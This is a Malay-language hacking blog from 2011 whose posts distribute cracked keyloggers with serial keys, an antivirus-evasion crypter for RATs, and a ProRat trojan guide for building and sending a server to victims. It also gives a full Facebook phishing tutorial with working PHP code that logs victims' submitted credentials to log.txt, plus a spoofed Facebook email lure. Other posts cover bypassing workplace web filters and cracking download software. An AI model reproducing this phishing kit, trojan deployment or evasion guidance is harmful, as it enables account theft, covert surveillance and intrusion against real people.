30 April 2011

Muat Turun Ardamax Keylogger v3.7.2 (Full Version)





Salam..sebelum ni memang sudah ada entry mengenai Ardamax..
tapi kali ini Mr.Hac ingin memberikan versi yang baru
(baru dapat @ baru jumpa..haha!)


Kalau nak baca entry lama mengenai Ardamax, sila ke sini ---> Muat Turun Ardamax Keylogger

Kalau nak tahu semua berkenaan dengan keylogger, sila ke sini ---> Keylogger : Semua Fakta Yang Anda Perlu Tahu


Jadi, dah cukup penerangan?
Ok..muat turun di sini ---> Ardamax Keylogger


KATA LALUAN MEDIAFIRE: hackthepc


Sila masukkan Serial Key dibawah:


Name: Popescu Marian
Serial: 083A-E649-5E15


Ia adalah serial key yang asli dan installer Ardamax yang diberikan itu juga adalah asli, dari laman pembangunnya, cuma telah di muat naik di Mediafire.silakan mencubanya!



Refog Keylogger v5.1.8.934 With Serial (Full Version)




Refog Keylogger + Serial (Full Version) is here!


Entry kali ni Hac penuhkan dengan keyloggers! sila lihat beberapa entry sebelum ini dimana Hac berikan kepada anda Actual Spy, Win Spy, dan tak lupa juga Ardamax yang mana semuanya adalah keylogger yang terbaik untuk digunakan! rasanya tak perlu diterangkan panjang mengenai Refog..

Ianya sama seperti keylogger yang lain, yang boleh merekodkan segala keystroke (keyboard stroke) iaitu taipan pada keyboard komputer anda. perisian yang sering digunakan oleh para crackers dan hackers untuk mendapatkan maklumat sulit / peribadi dari komputer orang lain.

Walaupun ini bukanlah versi yang terbaru, namun prestasinya sama. buat masa ini hanya versi ini yang Mr.Hac jumpa. sekiranya ada yang lebih baru, pasti akan diberikan dalam entry yang seterusnya!

Muat turun di sini:


Refog Keylogger v5.1.8.934

Refog Keylogger v5.1.8.934

Refog Keylogger v5.1.8.934



Actual Spy Keylogger v3.0 Full Portable Cracked


Actual Spy..satu lagi keylogger yang masuk dalam entry My Hackers Are Here.



Ciri-Ciri Actual Spy Keylogger (English):


* Logs all keystrokes, is case sensitive (keystroke logger).
* Makes screenshots within the specified time interval.
* Saves the applications’ running and closing.
* Watches clipboard contents.
* Records all print activity.
* Records disk changes.
* Records internet connections.
* Records all websites visited.
* Records startup/shutdown.
* All the information is stored in the encrypted log file.
* Convenient interface of the log and screenshot view.
* Generates the report in the text and html format.
* Sends the report to the specified email, via FTP or local area network.
* Works in the standard and hidden mode.


Boleh menetapkan kata laluan, jadi tiada sesiapa yang boleg melihat log keylogger ini pada komputer melainkan anda!


Muat turun di sini ---> Actual Spy v3.0 Cracked


Win Spy Keylogger Pro v9.0.175 Crack




Salam..sebenarnya dah lama Mr.Hac cari keylogger ni..
tapi baru terjumpa..keylogger Win Spy ni sangatlah berkesan dan
setanding dengan keylogger terkenal yang lain seperti Ardamax, Refog, dan lain-lain..


Ciri-Ciri Win Spy Keylogger:


• Stealth Monitoring
• Key Recorder
• Screen Capture
• KeyWord Alerter
• Folder Hider
• Monitor Networks
• Clear Tracks Utility
• WebCam via Internet
• Lost PC Tracking
• Secure File Deletion
• Time on Net Report
• Websites Visited Reports
• Immune to Anti-Spyware
• NEW – Remote Install
• NEW – Remote Screen Capture
• NEW – Remote Keylogger
• NEW – Remote PC Browser
• NEW – Notify’s User Online
• NEW – Remote Sound Lis/Rec
• NEW – Remote Cam View/Rec
• NEW – Remote file launch
• NEW – DualSide Chat Recording
• NEW – Remote PC Shutdown
• NEW – Remote PC FTP
• NEW – WebCam-Motion Detect
• NEW – WebAccess Remote PC

• Monitor Chat Room (dual side) and Web Activity
• Monitor any Email
• Monitor Children’s activities on Computer / Web
• Monitor Employees or counter monitor employers
• Monitor a cheating spouse
• Records any password
• Monitors across networks
• Monitor by user
• Monitor via Webcam (record/view)
• Monitor via Mic (record/view)
• Monitor multiple remote PC
• Remote Deployment and Monitoring
• Remote FTP (upload/download) any file to remote PC
• Password Protected and special Hot Key for program
• Monitor in Total Stealth
• Monitor Remote PC Webcam

Sistem Operasi yang disokong: Win98/ME/NT40/2000/XP/ Vista 32


Muat Turun di sini ---> Win Spy Keylogger v9.0.175 Cracked



29 April 2011

Zero Crypter @ 0 Crypter







Crypter ini adalah crypter yang ringkas, dan mudah digunakan.
ia berfungsi untuk menjadikan keylogger bebas dari dikesan oleh antivirus (Fully Undetectable @ F.U.D).

Telah diuji dan berkesan dengan:

-BlackShades
-CyberGate
-DarkComet
-Spy-Net
-Cerberus
-iStealer 6.0
-iStealer 6.3

Tidak berkesan dengan fail .NET


Muat turun Zero @ 0 Crypter di sini : Zero Crypter




ProRat Trojan (Hack Facebook, Gmail, Yahoomail)





Apa itu ProRat?

Ringkasnya ProRat ialah Remote Administration Tool (RAT) dan juga sejenis TROJAN yang mampu menyelinap ke dalam PC sasaran dan mendapatkan maklumat peribadi yang diingini.



Kaedah Menggunakan ProRat:

Terdapat berbagai cara untuk menggunakan ProRat. di sini disertakan kaedah yang paling mudah untuk menggunakannya.

Muat Turun ProRat terlebih dahulu : ProRat.Net

KATA LALUAN : pro

Log masuk ke No-IP.com dan daftar untuk mendapatkan satu akaun.

Kemudian, muat turun DNS Update Client. Jalankan program tersebut dan kemaskini hostname serta simpankannya.


Setelah itu, pergi ke start > Run... > taipkan cmd

taipkan PING *NAMA HOSTNAME ANDA*, tekan enter dan ia akan membalas dengan IP anda.

apabila anda telah disambungkan ke server yang telah dipilih, pergi ke folder dimana ProRat telah dipasangkan dan klik pada prorat.exe. rujuk gambar dibawah:



Klik pada Create, dan klik Create ProRat Server (sepertimana yang diberi).


satu tetingkap akan terbuka. rujuk gambar dibawah:



Selepas mengisi kesemua yang diperlukan, klik Create Server, dan server anda sudah sedia dihantar kepada sasaran. letakkan ia bersama dengan fail yang lain atau hantarkannya
terus kepada mangsa - terpulang.


Setelah sasaran menjalankan server ProRat, buka kembali ProRat dan klik ProConnective > seterusnya klik pada Start to list the ProConnective connections

Sila rujuk gambar dibawah:



Selesai. selebihnya Mr.Hac serahkan kepada anda untuk mengkaji sendiri.
dengan ProRat anda akan dapat segala maklumat yang anda ingini!




25 April 2011

Entry : Off


Salam..kepada semua pembaca, pelawat, khususnya kepada followers MyHac, untuk pengetahuan anda buat masa ini tiada lagi entry yang akan dikemaskini kerana Mr.Hac sibuk dengan tugasan..
Jadi janganlah anda kecewa, bimbang, atau runsing kerana masalah PC anda..
anda masih boleh menghubungi Mr.Hac melalui borang 'Hubungi Admin' diatas dan apabila Hac telah selesai menjalani tugas, Hac akan membalas e-mail-email anda itu..

Terima kasih atas sokongan anda semua..harap maaf..no yang anda dail, tiada dalam perkhidmatan..eh..
Salah info plak..
harap maaf la ye..harap anda semua boleh geledah la entry-entry lama..study mana yang tak habis lagi..ok!

21 April 2011

Cara Melajukan Broadband Yang Habis Limit (Mencapai Had Kuota Penggunaan)


Cara ni sebenarnya senang..tapi Hac bimbang bagi sesetengah orang yang baru dalam dunia IT, ia nampak susah..ini merupakan kaedah untuk melajukan broadband yang sudah habis limit atau sudah mencapai had penggunaan @ kuotanya..entry ini adalah respons kepada beberapa pembaca blog My Hackers Are Here yang meminta cara untuk hack speed broadband..artikel ni dah ada lama dah dalam blog orang lain..namun disebabkan ramai lagi yang tak tahu, jadi Hac ambil artikel mereka ini dan post disini sebagai rujukan..ianya telah diedit semula mengikut garapan penulisan gaya Hac..so..enjoy this article!

Artikel asal boleh tengok di sini ---> ALL SECRETS REVEALED

dan boleh juga tengok di sini ---> BudakBotak.com

(dah malas nak tulis sendiri..copy aje la..kredit diberikan sepenuhnya kepada tuan artikel..yeah!)


Cara Melajukan Broadband Yang Kehabisan Limit:


1) Pastikan pada waktu ini anda sudah disambungkan ke internet.
Klik start --> Run... Taipkan "cmd" dan tekan Enter.






Gambar ini adalah untuk Windows 7 atau Windows Vista




2. Tetingkap Command Prompt akan keluar. taipkan ipconfig/all dan tekan Enter.



3. Kemudian, senarai sambungan (connection) akan keluar. cari nama modem anda. lihat gambar dibawah.



4. Setelah itu taipkan ping [alamat IP anda] -t
Contoh: ping 10.175.53.131 -t
Sekiranya tiada sebarang balasan diterima, itu bermakna ping anda tidak berjaya.
sila cuba lagi.




5. Biarkan proses tersebut berjalan selama anda di atas talian (online). jika sudah tidak menggunakannya (offline) klik pangkah.


6. Boleh juga menggunakan fail batch untuk tidak mengulangi proses yang sama..sila salin kod dibawah ke dalam notepad dan simpan sebagai namayangandasuka.bat


@echo off
cd\
ping 10.176.44.70 -t

p/s: Sila gantikan 10.176.44.70 dengan gateway@dns broadband anda.


Terima kasih kepada BudakBotak dan ALL SECRETS REVEALED atas artikel ini.
Hac harap semua pembaca akan mendapat manfaat yang baik darinya.





Sejarah Web Browser (Grafik)


Berikut adalah grafik bagi Sejarah Web Browser iaitu Internet Explorer, Netscape, Google Chrome, Mozilla Firefox, Safari & Opera.


Pelajari Website Hacking & Security Testing Dengan DVWA Tools


Salam..pada entry ini Hac bukan nak ajar bagaimana cara untuk hack website. Tetapi Hac akan post satu tool untuk membenarkan kita mempelajari dengan selamat kaedah penyerangan laman web bagi tujuan ujian keselamatan.
ianya adalah Damn Vulnerable Web App.






Ujian Ancaman (Vulnerability Test):

* SQL Injection
* XSS (Cross Site Scripting)
* LFI (Local File Inclusion)
* RFI (Remote File Inclusion)
* Command Execution
* Upload Script
* Login Brute Force
* Blind SQL Injection

dan banyak lagi yang perlu diterokai oleh anda sendiri.


Penafian:

Aplikasi ini adalah sangat berbahaya..ia sememangnya diciptakan untuk penggodaman. JANGAN sesekali memuat naik aplikasi ini ke dalam web hosting kerana ia PASTI akan digodam!


Kaedah Pemasangan:

Sila muat turun DVWA di sini ---> Damn Vulnerable Web App

Tonton video dibawah untuk mengetahui kaedah pemasangan DVWA pada komputer anda dan pelajari bagaimana kaedah untuk hack sebuah laman web.








20 April 2011

Cara Menambah Kelajuan Internet Download Manager


Entry Cara Menambah Kelajuan Internet Download Manager ini adalah respons kepada Kotak Magika. sebenarnya sebelum beliau, sudah ramai yang meminta entry ini dibikin tetapi jarang dapat masa terluang yang begitu banyak seperti hari ini..jadi..jangan kita lengahkan lagi..mari kita hack IDM pula!




Entry ni Hac ambil dari blog Hackers Indonesia, Devil-404 jadi kredit Hac bagi kat dia la nohhh..


Klik pada bahagian Downloads lalu pilih ► Speed Limiter ► Settings... ► isikan pada bahagian Maximum download speed for one file dengan angka ► 50000 & klik OK





Kemudian klik ► Downloads ► Options ► Connection
Isi pada Default max.conn.number dengan angka ►16





Setelah itu klik ✔ pada Download Limits isi pada ruangan tersebut dengan angka berikut:

► 500 every
► 1 hours
► klik OK

Nota: Kepada sesiapa yang menggunakan internet berkelajuan tinggi, tetapan ini tidak harus digunakan.



Selesai!


Bagi mereka yang tiada IDM, sila muat turun di sini ---> Internet Download Manager


Kemudian hack & crack IDM secara manual! tutorialnya ada di sini ---> Kaedah Untuk Hack dan Crack Internet Download Manager Secara Manual


Kalau anda mahukan IDM versi crack, juga Hac ada ---> Internet Download Manager Complete Set

Kenapa complete set? hahaha..ni kali kedua aku jawab..lepas ni jangan tanya lagi dah..tu adalah koleksi peribadi Hac..kesemua crack dan keygen yang pernah Hac muat turun ada dalam tu..ia berkesan sehingga versi 6.05..jadi apa tunggu lagi..silalah muat turun sekarang dan mulakan hack & crack IDM sekarang!
sebarang masalah sila komen dibawah ya!





Cara Melajukan Internet Dengan TCP Optimizer


Entry Cara Melajukan Internet/Cara Menambah Kelajuan Internet ni dah masuk versi yang keberapa pun Hac dah tak ingat..tapi kali ni kita akan melajukan internet dengan satu aplikasi/perisian kecil (saiznya yang kecil, hanya 644kb sahaja). ianya adalah TCP Optimizer yang sudah masuk versi 3.0.7 (pada waktu entry ini ditulis).






Hac tak pasti sama ada entry ini pernah ditulis atau tidak..tapi anggap sahaja lah ianya entry yang baru..ye la..baru tulis! hahaha..

Nak menggunakannya sangat senang..tak perlu setting apa-apa..hanya tandakan (tick) di ruangan Choose settings itu pada kotak Optimal dan klik Apply changes.


Muat turun perisian ini di sini ---> TCP Optimizer v3.0.7




19 April 2011

Kaedah Memuat Naik Fail Phishing Ke Dalam Web Hosting


Salam..entry ini ialah respon kepada beberapa komen yang diberikan oleh encik anon dan encik zulfadhly..(orang yang sama kot?)
kesian betul..macam-macam masalah yang dihadapi oleh mereka ni..
jadi, untuk itu, Hac buat entry ni dengan harapan dapat selesaikan masalah dorang dan supaya harap-harapnya lepas ni tiada lagi soalan yang berbunyi "tak boleh upload la..nak buat macam mana ni?" hehehe..berat benor masalah deme ye..


OK..jangan melalut..jom kita mulakan pembelajaran hari ini!
Untuk entry ni, Hac gunakan Ripway.com sebab ia sangat mudah digunakan..
daftar tak sampai 5 minit dah boleh muat naik terus skrip yang kita mahu..


1. Ok..pertamanya, sila buat laman phishing terlebih dahulu dengan mengikuti tutorial ini ---> Kaedah Membuat Phisher Secara Manual

atau boleh juga menggunakan perisian ini ---> Perisian Super Phisher Untuk Membuat Laman Phishing Dengan Mudah


atau boleh juga muat turun skrip yang sudah disiapkan di sini (tapi faham-faham aje la..dah nama pun benda dah siap..ilmu tu dapat sikit aje la nohhh..) ---> Facebook Phishing by My Hackers Are Here


2. Dah siap laman phishing anda? kalau dah siap, sila daftar di Ripway.com atau di t35.com dan boleh juga di Bravenet.

3. Kemudian, muat naik fail-fail yang anda buat ke dalam akaun yang telah didaftarkan tersebut..bagi sesiapa yang mengatakan fail tidak boleh dimuat naik kerana bersaiz besar, sila lihat screenshot dibawah.


Lihat..saiz fail tidaklah besar..namun masalah itu sememangnya wujud kalau fail tersebut dimuat naik di t35.com. tidak mengapa..masih banyak pilihan web hosting yang lain..JANGAN PUTUS ASA..kalau putus asa dengan cepat, anda tidak layak untuk menjadi seorang HACKER..satu lagi, jangan KELAM KABUT..tenang..itu lah yang sebaik-baiknya..

4. Masalah dengan Ripway pula, walaupun laman phishing berjaya dipaparkan dengan sebaik-baiknya, akaun anda akan digantung dengan PANTAS DAN SERTA MERTA setelah anda berjaya melakukan phishing, iaitu setelah fail log.txt muncul apabila mangsa log masuk ke 'akaun' Facebooknya..jadi, serangan phishing menggunakan akaun Ripway hanya boleh dilakukan SEKALI sahaja dan anda perlu pantas melihat log.txt untuk mendapatkan kata laluan..kalau dengan Bravenet pula, ia agak rumit namun lebih baik daripada Ripway dan T35. cubalah salah satu daripada web hosting tersebut..sekiranya tiada satu pun akaun yang benar-benar berhasil, sila cari akaun web hosting percuma yang lain..sekiranya anda mendaftar di Ripway, setelah berhasil mendaftar, anda tidak perlukan pengesahan e-mail..jadi anda berikan e-mail palsu juga sudah boleh menggunakannnya..setelah mendaftar, akan keluar satu halaman 'Thank You' yang tidak ada apa-apa paparan..abaikan dan pergi semula ke Ripway.com..





5. Setelah memuat naik fail, maka ia akan menjadi seperti screenshot dibawah..
link yang telah dihighlight ialah link halaman phishing tersebut..




6. Ok..seterusnya, hantarkan pautan (link) itu tadi kepada sasaran. untuk menghantar e-mail palsu, sila rujuk entry ini ---> Bagaimana Cara Untuk Menghantar E-Mel Palsu


7. Anda boleh menggunakannya untuk menakutkan sasaran dengan e-mail palsu seperti noreply@facebook.com sebagai alamat e-mail 'anda', kemudian gunakan frasa seperti "Your account will be suspended due to our system down. Please login here to verify your account before we delete it."

8. Dibawahnya sertakan sekali link halaman log masuk palsu (phishing) yang telah anda buat sebentar tadi..

9. Setelah sasaran log masuk, mereka akan dihalakan ke alamat URL yang telah disetkan dalam login.php.

10. Anda boleh melihat kata laluan dan nama pengguna di log.txt. ia akan muncul diantara kedua-dua fail facebook.html dan login.php. kalau hendak muat naik terlebih dahulu pun tidak mengapa..akan tetapi ada sesetengah web hosting yang tidak menerima (reject) fail log.txt ini contohnya Ripway.com.

11. Selesai!




18 April 2011

Senarai 10 Web Browser Yang Jarang Didengari


Salam..kenapa Mr.Hac menggunakan perkataan web browser berbanding pelayar? ada juga yang bertanya ya..hmm..senang aje..sebab rata-rata keyword atau kata kunci yang datang ke blog Hac semuanya taip 'web browser' dan bukan 'pelayar web', apatah lagi 'pelayar laman sesawang'..hahaha..jarang ada orang yang menggunakan kata kunci sebegitu..jadi untuk memudahkan anda semua sampai kepada blog ini, kata kunci WEB BROWSER adalah yang terbaik untuk digunakan kerana semua orang faham.

Baiklah..tengok tajuk tu..macam gempak kan? percayalah, memang gempak sebab senarai 10 web browser ini walaupun bukanlah yang terbaik, terhebat, mahupun terpantas ataupun paling laju di dunia, namun, kalau kita adalah orang yang tidak sukakan statik, dan mahu mencuba sesuatu yang baru dalam hidup, maka web browser-web browser dibawah adalah sangat wajar dicuba..PERCUMA sahaja..jadi tidak ada sebarang kerugian kalau mencubanya..kalau tak suka? kalau tak suka, KEKALLAH dengan web browser yang anda pakai sekarang ini..tak marah pun~

Kita selalu menggunakan Mozilla Firefox, Google Chrome, Safari, Opera. Tidak lupa juga Internet Explorer (yang masih kekal lambat walaupun ada ura-ura mengatakan akan keluar versi 10). 'Peperangan' antara web browser utama di dunia ini adakalanya merimaskan, kerana apabila masing-masing sibuk dengan fungsi yang pelbagai, ada pengguna yang hanya mahukan 'sesuatu' yang unik berbanding fungsi-fungsi yang biasa seperti add-on, skins, sekuriti, dan lain-lain..

Oleh itu, di sini Mr.Hac senaraikan 10 web browser yang jarang didengari apatah lagi nak digunakan (ya lah..dah tak pernah dengar macam mana nak guna, ye tak?) beserta dengan beberapa lagi web browser BONUS yang MISTERI..kenapa misteri? sebab Mr.Hac jenuh cari homepage dan download link tapi rupa-rupanya memang tak ade! haktuih~!
hehehe..


1. Stainless




Stainless ialah web browser yang dicipta sebagai respons kepada Google Chrome..cantik kan? hahaha..satu daripada kelebihan Stainless ialah anda boleh log masuk ke dalam satu laman web dengan menggunakan dua akaun pada dua tab yang berbeza..

Sistem Operasi yang disokong oleh Stainless : OS X Leopard & Snow Leopard. yang lain? Hac pun masih belum cuba..ye la..10 buah web browser tu!


2. Maxthon




Mr.Hac dah pernah buat review pasal Maxthon..
sila klik di sini untuk membacanya ---> Maxthon 3.0

Sistem Operasi yang disokong: Windows


3. Sleipnir


Sleipnir ni web browser yang telah dicipta oleh orang-orang dinegara matahari terbit, iaitu Jepun. tak banyak yang Hac boleh cakap mengenai Sleipnir. korang cuba la sendiri kalau nak tahu lebih lanjut..reka bentuknya simple..dan boleh ditukar-tukar skin..boleh dicuba la senang cerita..heheh..

Sistem Operasi yang disokong : Windows 98 ke atas



4. Swiftfox




Ni nampak macam web browser ciplak kepada Firefox..tapi ia bukan tiruan..ianya asli tetapi reka bentuk/paparan antara mukanya memang lebih kurang sama atau boleh dikatakan sama dengan firefox versi lama-lama..old school gitu..hahaha..
pembangun web browser ni mengatakan ia lebih pantas..tak berani nak komen sebab tak cuba lagi..nanti peminat Firefox 4 marah pulak! jadi macam biasa la..korang pergi cuba sendiri..

Sistem operasi yang disokong: Linux. yang lain tak pasti nohhh..


5. Lunascape




Web browser ni tak payah cerita lagi la..dah berbuih mulut dengan jari Mr.Hac duk cerita pasal web browser Lunascape. sampai sekarang Hac tak pernah pakai web browser lain lagi dah..hati dah tertambat dengan web browser ni sebab kepantasan dan fungsinya!

nak baca ulasan Mr.Hac? klik di sini ---> Lunascape6

Sistem operasi yang disokong: Windows


6. Konqueror



mesti korang heran kan? apeke buruk benor namanya..itulah realiti..memang buruk..tapi nampak macam bagus..web browser ni sesuai untuk pengguna Linux yang inginkan web browser pelbagai fungsi..

Sistem operasi yang disokong : Linux


7. Seamonkey



Monyet laut? apakah?? hmm..ya..Seamonkey..web browser yang telah dibangunkan oleh Mozilla..web browser ni, Mr.Hac tiada komen..sebab tak faham sangat tujuan pembangunannya..ntah!

Sistem operasi yang disokong: Windows 2000 ke atas (terbaru), Mac OS X 10.4 ke atas (terbaru), & Linux.


8. OmniWeb


Reka bentuk yang cantik ala-ala web browser Safari! itulah yang mampu Mr.Hac katakan..ia menggunakan enjin webkit sebagai asas kepada pelayaran internet..

Sistem operasi yang disokong: Mac OS X 10.4.8 ke atas (terbaru)


9. Camino




Camino ialah web browser yang dibuat khas untuk pengguna Mac yang sukakan Firefox..reka bentuknya juga ada ala-ala Safari..ish..

Sistem operasi yang disokong: Mac OS X 10.4.8 ke atas (terbaru)


10. Flock




Ah..malang sekali..Flock adalah web browser yang bagus kerana ia menumpukan kepada jalinan laman-laman sosial..sama seperti web browser Rockmelt..namun ia telah ditamatkan pembangunannya..pembangun Flock sedang menumpukan kepada projek permainan (Game)..jadi terang panjang-panjang pun tak guna..kesian..

Sistem operasi yang disokong : Windows, Linux, Mac OS X



Web browser Bonus:

1. Rockmelt
2. Avant
3. Midori
4. Unity
5. Canure <--- Ni lah dia web browser yang misteri tu! link download pun daripada Mediafire! Laman pembangun pun tak ada..!! apekah??
6. SRWare Iron (Sila cari ulasan berkenaan web browser ini dalam blog Mr.Hac ni)
7. PhaseOut <--- ni lagi satu web browser yang misteri! pun tak ada halaman pembangun dan link download pula dari 4shared!
8. SlimBrowser
9. K-Meleon
10. x-B Browser
11. Browzar

Rasanya cukuplah setakat itu sahaja buat hari ini..ada banyak lagi sebenarnya dalam senarai ni..tapi cukup lah yang ada dalam entry ini untuk dicuba oleh anda semua.. Salam hormat dari Mr.Hac @ Mr.Rious..






Kaedah Membuat Phisher Secara Manual


Salam semua..untuk tajuk kali ini, bagi mereka yang tidak tahu apa itu phisher, secara ringkasnya ia adalah Fake Login Page atau halaman log masuk palsu yang dibuat untuk mendapatkan kata laluan dari para pengguna, contohnya Facebook, akaun emel dan lain-lain. Entry hari ini akan menerangkan kaedah membuat phisher/fake login page secara manual untuk kesemua laman web yang anda ingini.






1. Pertama sekali buka laman web yang anda ingin untuk membuat phisher, klik kanan pada ruang kosong dan pilih 'view source'. Salin kesemuanya ke dalam notepad dan save sebagai namayangandasuka.html


contoh untuk tutorial ini: Facebook.html


2. Kemudian, buka Facebook.html tadi dengan notepad dan kemudian cari (ctrl+f) string 'action = https..'. Tukarkan alamat tersebut kepada login.php dan save.




3. Setelah itu kita perlu mencipta login.php. Untuk itu buka notepad, salin kod berikut dan save sebagai login.php


<?php
header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Dapat dilihat disitu, sekiranya mangsa login, mereka akan diarahkan ke yahoo.com
sekiranya anda ingin mereka diarahkan ke alamat yang lain, anda hanya perlu menukar alamat http://yahoo.com itu.
Jika terdapat masalah pada code login.php ini, sila cuba code alternatif dibawah dan gantikan http://WEBSITE dengan alamat URL yang anda mahu :


header("Location: http://WEBSITE ");
$handle =


fopen("pass.txt", "a");
foreach($_GET as


$variable => $value) {
fwrite($handle,


$variable);
fwrite($handle, "=");


fwrite($handle, $value);
fwrite($handle,


"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;



4. Kemudian kita perlu mencipta fail log yang kosong (tempat penyimpanan kata laluan) dan untuk ini buka notepad, tidak perlu taip apa-apa, terus save sebagai log.txt


5. Buka satu akaun di laman web hosting percuma seperti T35.com atau 000Webhost.com


6. Muat naik ketiga-tiga fail tadi iaitu Facebook.html, login.php, log.txt ke dalam akaun web hosting yang telah dibuat dan ubah permissions bagi fail log.txt kepada 777

7. Untuk menggunakannya, hantar pautan (link) Facebook.html kepada mangsa dan setiap kali mereka log masuk melalui pautan itu, mereka akan diarahkan ke yahoo.com dan kata laluan (password) serta nama pengguna (username) akan dihantar ke fail log.txt. Anda boleh membuka log.txt untuk melihat kata laluan dan nama pengguna tersebut.




Kaedah Melepasi Sekatan Websense


Kebanyakan Syarikat atau Institusi Kerajaan menggunakan perisian penapisan laman web seperti Wensense untuk menyekat akses pengguna/pekerja daripada melawati laman-laman web tertentu ketika bekerja dengan tujuan untuk meningkatkan produktiviti.

Konsep Websense adalah mudah. Apabila seseorang pekerja membuat percubaan untuk melayari sesebuah laman web, satu permintaan akan dijana dan ia akan melepasi firewall. Websense 'membaca' permintaan tersebut dan akan memberikan 'laluan' kepada pemintanya atau menyekat bergantung kepada database yang ada pada Websense.


Di sini, disenaraikan beberapa kaedah yang telah ditulis untuk melepasi sekatan Websense. Ia adalah kaedah yang benar-benar berkesan dan bukan hanyak teori sahaja. jadi jika anda tidak menemukan sebarang kaedah yang anda tahu di sini, bermakna ia tidak tersenarai dalam kaedah yang benar-benar memberikan kesan.

Melepasi sekatan Websense dengan menggunakan Ultrasurf

Ultrasurf ialah sebuah perisian yang bersaiz kecil, yang mampu membantu pengguna untuk melayari laman web yang telah disekat oleh Websense. ia menggunakan kaedah Tunneling yang termaju dalam kategorinya.

Untuk memahami dengan lebih lanjut mengenai Ultrasurf, klik di sini ---> Ultrasurf : Hide Your IP and Use anonymous Web Browsing

Untuk mengetahui soalan-soalan lazim mengenai Ultrasurf. klik di sini ---> Soalan-Soalan Lazim Mengenai Ultrasurf

Melepasi sekatan Websense dengan menggunakan Circumventor

Circumventor ialah sebuah halaman (page) yang berasaskan web (web-base) yang 'mengambil' sebuah laman web yang disekat dan 'membawanya' melalui sebuah laman yang tidak disekat untuk membolehkan pengguna melihat laman web tersebut..

Untuk melayari laman Circumventor dan melanggani Circumventor yang terbaru,
sila klik di sini ---> Peacefire

Melepasi sekatan Websense dengan menggunakan Toonel

Toonel.net telah ditulis sepenuhnya dengan menggunakan skrip/kod Java (sapa kata Java tak power tu?)
pada asalnya ia dicipta untuk menjimatkan penggunaan bandwidth bagi yang membayar untuknya (contohnya pengguna broadband, Streamix, P1 Wimax, dan lain-lain..).
Namun kaedah ia berfungsi telah menyebabkan ia menjadi perisian anti Blocking Software secara pasif..
Ia mengkompresi/memadatkan hampir kesemua lalu lintas (traffic) seperti HTTP, Email, FTP, dan data TCP/IP yang lain melalui satu 'terowong' (tunnel) dalam perisian Toonel.net. Ia mengurangkan sumber kuasa yang dipindahkan antara pelayan dan pelanggan (server and client) yang menjadikan kadar penggunaan bandwidth lebih menjimatkan..Data yang terenkrispsi melalui terowong Toonel.net ini telah menyebabkan kekeliruan pada server asal sehingga menyebabkan ia menyangka pengguna ingin membuka laman yang tidak berada dalam senarai Blocking Software.

Cuma setelah menggunakan Toonel, kelajuan internet akan menjadi berkurangan. namun setiap laman web yang telah disekat mampu dilayari dengan baik kecuali laman web video streaming seperti Youtube, Metacafe dan lain-lain.

Untuk mencuba Toonel, klik di sini ---> Anti Office Blocking Software (Siri Pertama)

Melepasi sekatan Websense dengan menggunakan VPN

VPN adalah singkatan daripada perkataan Virtual Private Network..apa pula Virtual Private Network tu? ok..begini..ianya adalah rangkaian peribadi (private network) yang membolehkan pengguna berhubung dengan pengguna yang lain, atau remote sites menggunakan rangkaian awam (public network) iaitu internet..ia menggunakan sambungan 'maya' ke internet melalui rangkain peribadi syarikat yang menyediakannya terus kepada remote sites dan bukannya melalui sambungan fizikal..secara ringkas ia adalah rangkaian peribadi yang dibina dalam insfrastruktur rangkaian awam..

Untuk mengetahui senarai VPN PERCUMA yang boleh digunakan, klik di sini ---> Free VPN Service : Senarai 10 Servis VPN Percuma

Setakat ini, senarai kaedah di atas ialah cara-cara melepasi sekatan Websense yang paling BERKESAN dan paling MUDAH. sekiranya ada lagi kaedah yang lebih baik, akan ada lagi entry terbaru yang bakal menyusul..sekian sahaja buat masa ini..
Salam hormat.

15 April 2011

Apa Itu Websense?




Websense ialah sebuah syarikat yang mengeluarkan perisian penapisan laman web yang dipanggil dengan nama yang sama - Websense. Perisian ini direka untuk menyekat akses pengguna ke laman web tertentu di Internet. Websense bermula pada tahun 1994 oleh Phil Trubey dan merupakan salah satu perisian penapisan laman yang paling popular digunakan. Perisian ini boleh digunakan oleh pelbagai jenis organisasi dan untuk pelbagai tujuan.








Organisasi Yang Menggunakan Websense dan Apa Tujuan Utama Websense Digunakan:

Banyak organisasi yang boleh menggunakan perisian Websense kerana pelbagai alasan. Sebagai contoh:

* Sekolah : boleh menapis kandungan dewasa (Adult Content) sehingga pelajar secara haram boleh mengakses laman-laman lucah.
* Perniagaan : organisasi juga boleh menapis akses terhadap bahan-bahan untuk orang orang dewasa (18SX) bersama-sama dengan jenis lain dari laman web yang boleh melambatkan produktiviti.
* Setiap syarikat swasta juga boleh membeli perisian Websense dan menyekat laman-laman tertentu untuk melindungi dirinya atau ahli keluarga dari pemangsa internet, laman web scam, dan lain-lain.
* Banyak negara dan pemerintah daerah juga saat ini menggunakan Websense di pejabat mereka bersama-sama dengan perpustakaan yang membolehkan masyarakat untuk mengakses maklumat di dalam komputer kerajaan.
* Juga harus diingat bahawa kerajaan seperti China dan Yaman juga telah menggunakan perisian ini untuk menyekat akses warga negaranya ke laman web tertentu.

Apakah Jenis Laman Web Yang Boleh Disekat Oleh Websense:

Ada lebih dari 3 dozen jenis laman web yang dapat dihalang oleh Websense dan perlu dicatat bahawa pengguna individu atau organisasi boleh membuat senarai mereka sendiri terhadap laman web yang khusus untuk disekat. Namun disenaraikan disini adalah sepuluh kategori paling popular yang banyak digunakan oleh organisasi-organisasi di seluruh dunia:

* Bahan Dewasa (18SX)
* Pertemuan dan Peribadi (Dating and Personal)
* Rangkaian Peer to Peer
* Laman Untuk Memuat Turun Perisian Freeware dan Shareware
* Laman Berbentuk Perjudian
* Laman Pembenci (Hate Sites)
* Laman Proxy
* Laman Video Streaming
* Laman Permainan
* Laman yang Mempromosikan Kegiatan Haram


Perkhidmatan Tambahan Yang Ditawarkan oleh Websense

Selain sekatan terhadap halaman khusus atau halaman yang terbahagi kepada kategori, dengan bayaran tambahan, Websense juga menawarkan pelbagai produk; di sini adalah hanya beberapa dari tawaran produk mereka yang paling popular.


Perlindungan Kebocoran Maklumat

